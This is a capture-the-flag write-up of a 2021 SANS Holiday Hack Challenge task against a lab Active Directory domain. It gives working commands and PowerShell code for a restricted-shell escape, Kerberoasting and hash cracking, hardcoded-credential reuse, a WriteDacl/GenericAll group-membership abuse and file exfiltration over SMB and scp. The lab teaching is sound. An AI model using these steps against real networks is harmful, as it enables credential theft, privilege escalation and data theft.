Objective 8: Kerberoasting on an Open Fire - 2021 SANS Holiday Hack Challenge

15 minute read

This time, we’re going to be attacking Active Directory.

Play the 2021 SANS Holiday Hack Challenge

Objective

Obtain the secret sleigh research document from a host on the Elf University domain. What is the first secret ingredient Santa urges each elf and reindeer to consider for a wonderful holiday season? Start by registering as a student on the ElfU Portal.

Hints

  • Investigating Active Directory errors is harder without Bloodhound, but there are native methods.
  • Learn about Kerberoasting to leverage domain credentials to get usernames and crackable hashes for service accounts.
  • Administrators often store credentials in scripts. These can be coopted by an attacker for other purposes!
  • Check out Chris Davis’ talk and scripts on Kerberoasting and Active Directory permissions abuse.
  • There will be some 10.X.X.X networks in your routing tables that may be interesting. Also, consider adding -PS22,445 to your nmap scans to “fix” default probing for unprivileged scans.
  • OneRuleToRuleThemAll.rule is great for mangling when a password dictionary isn’t enough.
  • CeWL can generate some great wordlists from websites, but it will ignore digits in terms by default.

Inititial access

The link in the objective takes us here: https://register.elfu.org/register

This gets us to a registration page. Let’s register for an account. We get a username and password back, in addition to an SSH command.

SSH-ing to that server using the given command presents us with the following prompt:

===================================================
=      Elf University Student Grades Portal       =
=          (Reverts Everyday 12am EST)            =
===================================================
1. Print Current Courses/Grades.
e. Exit
:

e just closes the connection. Entering 1 gives us a report card and no additional options. Looks like we need to escape this little app first.

After some trial and error, hitting CTRL+D gets us out of the app and into an interactive python session. Nice!

Note: CTRL+D is the EOF or End of File command in python, and typically closes python programs.

Now all we have to do is spawn a shell for ourselves. This is easy enough with python’s built-in subprocess module:

import subprocess
subprocess.call('/bin/bash -i', shell=True)

Finding the Domain Controller

Let’s try finding the domain controller. One of the hints tells us that “there will be some 10.X.X.X networks in your routing tables that may be interesting”, so let’s look for those using netstat:

netstat -rn

Output:

Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
0.0.0.0         172.17.0.1      0.0.0.0         UG        0 0          0 eth0
10.128.1.0      172.17.0.1      255.255.255.0   UG        0 0          0 eth0
10.128.2.0      172.17.0.1      255.255.255.0   UG        0 0          0 eth0
10.128.3.0      172.17.0.1      255.255.255.0   UG        0 0          0 eth0
172.17.0.0      0.0.0.0         255.255.0.0     U         0 0          0 eth0

So 10.128.0.0/22 (i.e. 10.128.0.0-10.128.3.255) is the subnet we should be looking through. Let’s look for possible domain controllers on the network then:

nmap -sV -p 636 -oG 'nmap.scan' -PS22,445 '10.128.0.0/22'

Here’s what each of the parts of this command are doing:

  • -sV: enumerate services and versions
  • -p 636: scan port 636, which is the port used for the Lightweight Directory Access Protocol (LDAP)
  • -oG ‘nmap.scan’: output in a grep-able format and call the output file nmap.scan
  • -PS22,445: do TCP SYN discovery on ports 22 and 445 (per the hint)
  • ‘10.128.0.0/22’ : the IP range we’re scanning

Then to search for the domain controller, we can just grep through the results:

cat nmap.scan | grep open

Output:

Host: 10.128.1.53 (hhc21-windows-dc.c.holidayhack2021.internal) Ports: 636/open/tcp//tcpwrapped///
Host: 10.128.3.30 ()    Ports: 636/open/tcp//ssl|ldap//(Anonymous bind OK)/

So we have two potential IPs: 10.128.1.53 and 10.128.3.30. Let’s gather some additional info on these hosts:

nmap -sV -sC -p- -PS22,445 10.128.1.53 10.128.3.30

10.128.1.53

Nmap scan report for hhc21-windows-dc.c.holidayhack2021.internal (10.128.1.53)
Host is up (0.00053s latency).
Not shown: 65514 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-12-27 23:25:10Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: elfu.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: elfu.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: ELFU
|   NetBIOS_Domain_Name: ELFU
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: elfu.local
|   DNS_Computer_Name: DC01.elfu.local
|   DNS_Tree_Name: elfu.local
|   Product_Version: 10.0.17763
|_  System_Time: 2021-12-27T23:27:27+00:00
| ssl-cert: Subject: commonName=DC01.elfu.local
| Not valid before: 2021-10-28T19:21:37
|_Not valid after:  2022-04-29T19:21:37
|_ssl-date: 2021-12-27T23:28:05+00:00; 0s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=hhc21-windows-dc
| Subject Alternative Name: DNS:hhc21-windows-dc
| Not valid before: 2021-10-26T18:27:04
|_Not valid after:  2022-10-26T18:27:04
|_ssl-date: 2021-12-27T23:28:05+00:00; 0s from scanner time.
| tls-alpn: 
|_  http/1.1
9389/tcp  open  mc-nmf        .NET Message Framing
49671/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49682/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  msrpc         Microsoft Windows RPC
49707/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=12/27%Time=61CA4B5B%P=x86_64-pc-linux-gnu%r(DNS
SF:VersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version
SF:\x04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-12-27T23:27:30
|_  start_date: N/A

10.128.3.30

Nmap scan report for 10.128.3.30
Host is up (0.00030s latency).
Not shown: 65501 closed ports
PORT     STATE SERVICE      VERSION
22/tcp   open  ssh          OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 8c:b0:2b:dd:7f:c0:a5:da:7d:fb:8b:49:47:0a:64:bb (RSA)
|   256 17:17:3c:96:a6:c6:84:0e:90:84:30:22:89:97:8c:8b (ECDSA)
|_  256 f2:52:26:92:b8:9e:d8:fd:79:0c:b4:9a:c2:a2:12:eb (ED25519)
53/tcp   open  domain       (generic dns response: NOTIMP)
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp   open  http         Werkzeug httpd 2.0.2 (Python 3.8.10)
|_http-server-header: Werkzeug/2.0.2 Python/3.8.10
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was http://10.128.3.30/register
88/tcp   open  kerberos-sec Heimdal Kerberos (server time: 2021-12-27 23:25:10Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Samba smbd 3.X - 4.X (workgroup: ELFU)
389/tcp  open  ldap         (Anonymous bind OK)
| ssl-cert: Subject: commonName=SHARE30.elfu.local/organizationName=Samba Administration
| Not valid before: 2021-10-29T19:30:08
|_Not valid after:  2023-09-29T19:30:08
|_ssl-date: 2021-12-27T23:28:58+00:00; +53s from scanner time.
445/tcp  open  netbios-ssn  Samba smbd 4.3.11-Ubuntu (workgroup: ELFU)
464/tcp  open  kpasswd5?
636/tcp  open  ssl/ldap     (Anonymous bind OK)
| ssl-cert: Subject: commonName=SHARE30.elfu.local/organizationName=Samba Administration
| Not valid before: 2021-10-29T19:30:08
|_Not valid after:  2023-09-29T19:30:08
|_ssl-date: 2021-12-27T23:28:41+00:00; +36s from scanner time.
1024/tcp open  msrpc        Microsoft Windows RPC
1025/tcp open  tcpwrapped
1026/tcp open  tcpwrapped
1027/tcp open  tcpwrapped
1028/tcp open  tcpwrapped
1029/tcp open  tcpwrapped
1030/tcp open  tcpwrapped
1031/tcp open  tcpwrapped
1032/tcp open  tcpwrapped
1033/tcp open  tcpwrapped
1034/tcp open  tcpwrapped
1035/tcp open  tcpwrapped
1036/tcp open  tcpwrapped
1037/tcp open  tcpwrapped
1038/tcp open  tcpwrapped
1039/tcp open  tcpwrapped
1040/tcp open  tcpwrapped
1041/tcp open  tcpwrapped
1042/tcp open  tcpwrapped
1043/tcp open  tcpwrapped
1044/tcp open  tcpwrapped
2222/tcp open  ssh          OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
3268/tcp open  ldap         (Anonymous bind OK)
| ssl-cert: Subject: commonName=SHARE30.elfu.local/organizationName=Samba Administration
| Not valid before: 2021-10-29T19:30:08
|_Not valid after:  2023-09-29T19:30:08
|_ssl-date: 2021-12-27T23:30:12+00:00; +2m07s from scanner time.
3269/tcp open  ssl/ldap     (Anonymous bind OK)
| ssl-cert: Subject: commonName=SHARE30.elfu.local/organizationName=Samba Administration
| Not valid before: 2021-10-29T19:30:08
|_Not valid after:  2023-09-29T19:30:08
|_ssl-date: 2021-12-27T23:29:59+00:00; +1m54s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=12/27%Time=61CA4B5B%P=x86_64-pc-linux-gnu%r(DNS
SF:VersionBindReqTCP,2B,"\0\)\0\x06\x81\x80\0\x01\0\0\0\0\0\x01\x07version
SF:\x04bind\0\0\x10\0\x03\0\0\)\x02\0\0\0\0\0\0\0")%r(DNSStatusRequestTCP,
SF:E,"\0\x0c\0\0\x90\x04\0\0\0\0\0\0\0\0");
Service Info: Host: SHARE30; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 47s, deviation: 53s, median: 35s
|_nbstat: NetBIOS name: SHARE30, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: share30
|   NetBIOS computer name: SHARE30\x00
|   Domain name: elfu.local
|   FQDN: share30.elfu.local
|_  System time: 2021-12-27T23:27:30+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-12-27T23:27:30
|_  start_date: N/A

From this, we can pretty safely assume from this that the domain is “elfu.local”. There are also some SMB shares on 10.128.3.30. Let’s check those out.

SMB Shares

Let’s see what those shares are:

smbclient -L \\\\10.128.3.30\\

output:

Sharename       Type      Comment
---------       ----      -------
netlogon        Disk      
sysvol          Disk      
elfu_svc_shr    Disk      elfu_svc_shr
research_dep    Disk      research_dep
IPC$            IPC       IPC Service (Samba 4.3.11-Ubuntu)
SMB1 disabled -- no workgroup available

We can try to log into the shares with:

smbclient \\\\10.28.3.30\\<SHARE NAME>

None of the shares we have access to have anything interesting in them.

Kerberoasting

Let’s see if we can do any Kerberoasting. We’ll use Impacket’s GetUserSPNs.py:

Copy/paste the file from GitHub directly into a file called GetUserSPNs.py and then run it.

GetUserSPNs.py -outputfile spns.txt elfu.local/<USERNAME>:<PASSWORD>

Output:

ServicePrincipalName                 Name      MemberOf  PasswordLastSet             LastLogon                   Delegation 
-----------------------------------  --------  --------  --------------------------  --------------------------  ----------
ldap/elfu_svc/elfu                   elfu_svc            2021-10-29 19:25:04.305279  2021-12-28 22:41:44.214743             
ldap/elfu_svc/elfu.local             elfu_svc            2021-10-29 19:25:04.305279  2021-12-28 22:41:44.214743             
ldap/elfu_svc.elfu.local/elfu        elfu_svc            2021-10-29 19:25:04.305279  2021-12-28 22:41:44.214743             
ldap/elfu_svc.elfu.local/elfu.local  elfu_svc            2021-10-29 19:25:04.305279  2021-12-28 22:41:44.214743

Looks like the saved SPN hash will give us access to the elfu_svc user if we can crack it.

We can print out the hash

cat spns.txt

and then copy/paste the contents of spns.txt right to our machine so we can crack it.

Creating a Wordlist

From guidance in the hints, we can assume we’re going to be using cewl. We can run all of these commands on our own machine. Ippsec’s video on Fuse from HackTheBox is a pretty good demo of these tools.

cewl -d 7 -m 8 --with-numbers -w cewl.out https://register.elfu.org/register

This gives us cewl.out, which contiains a custom list of some potential passwords.

This is a good start. Now let’s mangle it using OneRuleToRuleThemAll.

We’ll clone the repository

git clone https://github.com/NotSoSecure/password_cracking_rules.git

and run hashcat

hashcat cewl.out -r password_cracking_rules/OneRuleToRuleThemAll.rule --stdout > mangled_list.txt

NOTE: After running this, check to make sure that the mangled list is UTF-8 encoded. Otherwise hashcat won’t parse it properly.

Cracking the hash

We can use hashcat again to crack the hash:

hashcat -m 13100 mangled_list.txt spns.txt

This gives us a password of Snow2021!

Checking out the SMB Shares Again

One of the SMB Shares was called elfu_svc_shr. Sounds like our elfu_svc user probably has access to it.

smbclient -U elfu_svc  \\\\10.128.3.30\\elfu_svc_shr

Input the password and we’re in!

Running ls shows us a whole bunch of powershell scripts. Let’s download them all so we can look through them.

First, we’ll create an smb folder in our home folder to keep things organized. cd into that folder. Then we’ll go back into the smb share (same command as above) and execute the following:

prompt OFF
mget *
exit

Now if we run ls we can see all of the scripts in our local directory.

The next step would be to see if there are any credentials for AD users that we can leverage. Grepping through the files just for strings like password was a bit too much to parse though. Maybe we can search for a username instead.

Enumerating AD users

Let’s just get the basics with GetADUsers.py from impacket.

We’ll copy/paste it straight from GitHub into a file called GetADUsers.py again and run it:

GetADUsers.py -all elfu.local/<USERNAME>:<PASSWORD>

(use whatever valid AD credentials you want)

This gives us a list of AD users. Two immediately pop out as interesting: elfu_admin and remote_elf

Looking through the scripts

If we grep for those users, maybe we can get something.

grep -E '(remote_elf|elfu_admin)' *.ps1

Note: -E just tells grep that we’re using a regular expression as the filter.

In the output is this line from GetProcessInfo.ps1:

$aCred = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.local\remote_elf", $aPass)

Let’s see what that file is:

cat GetProcessInfo.ps1

Output:

$SecStringPassword = "<GIANT ENCODED STRING>"
$aPass = $SecStringPassword | ConvertTo-SecureString -Key 2,3,1,6,2,8,9,9,4,3,4,5,6,8,7,7
$aCred = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.local\remote_elf", $aPass)
Invoke-Command -ComputerName 10.128.1.53 -ScriptBlock { Get-Process } -Credential $aCred -Authentication Negotiate

Looks like this is running a command on a remote machine that happens to be one of the domain controllers we saw earlier. Seems like this should be our next move.

Pivoting

A bit of googling for powershell remoting gives us this microsoft doc on running remote commands. If we want a shell, we just need to swap out Invoke-Command for Enter-PSSession and delete a flag.

Let’s create a new script for ourselves to give us a remote shell as that user.

cp GetProcessInfo.ps1 ~\Get_Remote_Session.ps1

We’ll change the last line of the new Get_Remote_Session.ps1 file to this:

Enter-PSSession -ComputerName 10.128.1.53 -Credential $aCred -Authentication Negotiate 

Despite this box being a linux box, it does have powershell on it, so we can just use that to run this script cleanly:

powershell
./Get_Remote_Session.ps1

And this drops us into a shell as the remote_elf user on the 10.128.1.53 box!

Getting Access to the Right Group

Let’s see a list of all of the AD groups in the domain:

Get-ADGroup -filter *

This outputs a long list, but this group jumps out at me:

DistinguishedName : CN=Research Department,CN=Users,DC=elfu,DC=local
GroupCategory     : Security
GroupScope        : Global
Name              : Research Department
ObjectClass       : group
ObjectGUID        : 8dd5ece3-bdc8-4d02-9356-df01fb0e5f3d
SamAccountName    : ResearchDepartment
SID               : S-1-5-21-2037236562-2033616742-1485113978-1108

(reminder that our goal in this challenge is to “Obtain the secret sleigh research document…”)

Do we have any privileges to edit that group? Let’s check using the code from the talk in the hints.

$ADSI = [ADSI]"LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
$ADSI.psbase.ObjectSecurity.GetAccessRules($true,$true,[Security.Principal.NTAccount])

Looking through the output, we can see that we have access to the WriteDacl permission:

ActiveDirectoryRights : WriteDacl
InheritanceType       : None
ObjectType            : 00000000-0000-0000-0000-000000000000
InheritedObjectType   : 00000000-0000-0000-0000-000000000000
ObjectFlags           : None
AccessControlType     : Allow
IdentityReference     : ELFU\remote_elf
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None

This means we can give whoever we want GenericAll permissions and then they can add whoever they want to the group. We can do that using another one of the code snippets from the talk:

Add-Type -AssemblyName System.DirectoryServices
$ldapConnString = "LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
$username = "bjswlxyudl"
$nullGUID = [guid]'00000000-0000-0000-0000-000000000000'
$propGUID = [guid]'00000000-0000-0000-0000-000000000000'
$IdentityReference = (New-Object System.Security.Principal.NTAccount("elfu.local\$username")).Translate([System.Security.Principal.SecurityIdentifier])
$inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None
$ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityReference, ([System.DirectoryServices.ActiveDirectoryRights] "GenericAll"), ([System.Security.AccessControl.AccessControlType] "Allow"), $propGUID, $inheritanceType, $nullGUID
$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString
$secOptions = $domainDirEntry.get_Options()
$secOptions.SecurityMasks = [System.DirectoryServices.SecurityMasks]::Dacl
$domainDirEntry.RefreshCache()
$domainDirEntry.get_ObjectSecurity().AddAccessRule($ACE)
$domainDirEntry.CommitChanges()
$domainDirEntry.dispose()

Running those same two ADSI commands again, we can see that our initial user now has GenericAll access.

ActiveDirectoryRights : GenericAll
InheritanceType       : None
ObjectType            : 00000000-0000-0000-0000-000000000000
InheritedObjectType   : 00000000-0000-0000-0000-000000000000
ObjectFlags           : None
AccessControlType     : Allow
IdentityReference     : ELFU\<USERNAME>
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None

Now let’s add our user to the group using another code snippet from the talk:

Add-Type -AssemblyName System.DirectoryServices
$ldapConnString = "LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
$username = "<USERNAME>"
$password = "<PASSWORD>"
$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString, $username, $password
$user = New-Object System.Security.Principal.NTAccount("elfu.local\$username")
$sid=$user.Translate([System.Security.Principal.SecurityIdentifier])
$b=New-Object byte[] $sid.BinaryLength
$sid.GetBinaryForm($b,0)
$hexSID=[BitConverter]::ToString($b).Replace('-','')
$domainDirEntry.Add("LDAP://<SID=$hexSID>")
$domainDirEntry.CommitChanges()
$domainDirEntry.dispose()

We can check to make sure it worked:

Get-ADGroup -Identity 'ResearchDepartment' -Properties member | Select-Object -ExpandProperty member

The output contains our username, so we’re good to go. (If it doesn’t contain your username yet, wait a few minutes for it to propogate)

Type exit twice to exit the remote powershell session and then the initial powershell session, sending us back to the linux shell.

Exfiltrate the File

Now all we have to do is get the file back onto our local machine so we can read it.

smbclient \\\\10.128.3.30\\research_dep

If we run ls, we can see the file we need.

.                                   D        0  Thu Dec  2 16:39:42 2021
..                                  D        0  Tue Dec 28 21:35:08 2021
SantaSecretToAWonderfulHolidaySeason.pdf      N   173932  Thu Dec  2 16:38:26 2021

Now let’s get it to our home directory:

prompt OFF
mget SantaSecretToAWonderfulHolidaySeason.pdf
exit

If we change our login shell from that app we got dropped into to something like /bin/bash, we should be able to exfiltrate this file.

chsh
<ENTER YOUR PASSWORD>
/bin/bash

Now we can use scp to get the file to our local machine. (Run this on your local machine)

scp -P 2222 <USERNAME>@grades.elfu.org:~/*.pdf .

And now we can open up the PDF on our local machine to get our answer.

Answer: Kindness

Extra Bits

AD Enumeration

Got the following from Hacktricks

We’ll start up python

python3

and grab info from the domain controller:

import ldap3
server = ldap3.Server('10.128.3.30', get_info = ldap3.ALL, port =636, use_ssl = True)
connection = ldap3.Connection(server)
connection.bind()
server.info

output:

DSA info (from DSE):
  Supported LDAP versions: 2, 3
  Naming contexts: 
    CN=Schema,CN=Configuration,DC=elfu,DC=local
    CN=Configuration,DC=elfu,DC=local
    DC=elfu,DC=local
    DC=DomainDnsZones,DC=elfu,DC=local
    DC=ForestDnsZones,DC=elfu,DC=local
  Supported controls: 
    1.2.840.113556.1.4.1338 - Verify name - Control - MICROSOFT
    1.2.840.113556.1.4.1339 - Domain scope - Control - MICROSOFT
    1.2.840.113556.1.4.1340 - Search options - Control - MICROSOFT
    1.2.840.113556.1.4.1341 - RODC DCPROMO - Control - MICROSOFT
    1.2.840.113556.1.4.1413 - Permissive modify - Control - MICROSOFT
    1.2.840.113556.1.4.1413 - Permissive modify - Control - MICROSOFT
    1.2.840.113556.1.4.1413 - Permissive modify - Control - MICROSOFT
    1.2.840.113556.1.4.1413 - Permissive modify - Control - MICROSOFT
    1.2.840.113556.1.4.1413 - Permissive modify - Control - MICROSOFT
    1.2.840.113556.1.4.1413 - Permissive modify - Control - MICROSOFT
    1.2.840.113556.1.4.1504 - Attribute scoped query - Control - MICROSOFT
    1.2.840.113556.1.4.2064 - Show recycled - Control - MICROSOFT
    1.2.840.113556.1.4.319 - LDAP Simple Paged Results - Control - RFC2696
    1.2.840.113556.1.4.417 - LDAP server show deleted objects - Control - MICROSOFT
    1.2.840.113556.1.4.473 - Sort Request - Control - RFC2891
    1.2.840.113556.1.4.529 - Extended DN - Control - MICROSOFT
    1.2.840.113556.1.4.801 - Security descriptor flags - Control - MICROSOFT
    1.2.840.113556.1.4.801 - Security descriptor flags - Control - MICROSOFT
    1.2.840.113556.1.4.805 - Tree delete - Control - MICROSOFT
    1.2.840.113556.1.4.841 - Directory synchronization - Control - MICROSOFT
  Supported features: 
    1.2.840.113556.1.4.1670 - Active directory V51 - Feature - MICROSOFT
    1.2.840.113556.1.4.1791 - Active directory LDAP Integration - Feature - MICROSOFT
    1.2.840.113556.1.4.1935 - Active directory V60 - Feature - MICROSOFT
    1.2.840.113556.1.4.2080 - Active directory V61 R2 - Feature - MICROSOFT
    1.2.840.113556.1.4.800 - Active directory - Feature - MICROSOFT
  Supported SASL mechanisms: 
    GSS-SPNEGO, GSSAPI, NTLM
  Schema entry: 
    CN=Aggregate,CN=Schema,CN=Configuration,DC=elfu,DC=local
Vendor name: Samba Team (http://samba.org)
Vendor version: 4.3.11-Ubuntu
Other:
  configurationNamingContext: 
    CN=Configuration,DC=elfu,DC=local
  defaultNamingContext: 
    DC=elfu,DC=local
  rootDomainNamingContext: 
    DC=elfu,DC=local
  schemaNamingContext: 
    CN=Schema,CN=Configuration,DC=elfu,DC=local
  isSynchronized: 
    TRUE
  dsServiceName: 
    CN=NTDS Settings,CN=SHARE30,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=elfu,DC=local
  serverName: 
    CN=SHARE30,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=elfu,DC=local
  dnsHostName: 
    share30.elfu.local
  ldapServiceName: 
    elfu.local:share30$@ELFU.LOCAL
  currentTime: 
    20211228003627.0Z
  highestCommittedUSN: 
    4826
  domainFunctionality: 
    3
  forestFunctionality: 
    3
  domainControllerFunctionality: 
    4
  isGlobalCatalogReady: 
    TRUE

This confirms that the domain is elfu.local. Nothing else terribly interesting here at a glance.

Searching for SMB shares

Let’s look for any file shares on that /22 network. SMB commonly runs on ports 139 and 445

nmap -p139,445 -PS22,445 -oX 'nmap.xml' --script smb-enum-shares --script-args smbusername='<USERNAME>',smbpassword='<PASSWORD>' '10.128.0.0/22'
cat nmap.xml | grep 'table key'

output:

<table key="\\10.128.3.30\IPC$">
<table key="\\10.128.3.30\elfu_svc_shr">
<table key="\\10.128.3.30\netlogon">
<table key="\\10.128.3.30\research_dep">
<table key="\\10.128.3.30\sysvol">

so the only host with open shares of interest is 10.128.3.30.

smbclient -L \\\\10.128.3.30\\

output:

Sharename       Type      Comment
---------       ----      -------
netlogon        Disk      
sysvol          Disk      
elfu_svc_shr    Disk      elfu_svc_shr
research_dep    Disk      research_dep
IPC$            IPC       IPC Service (Samba 4.3.11-Ubuntu)

Updated: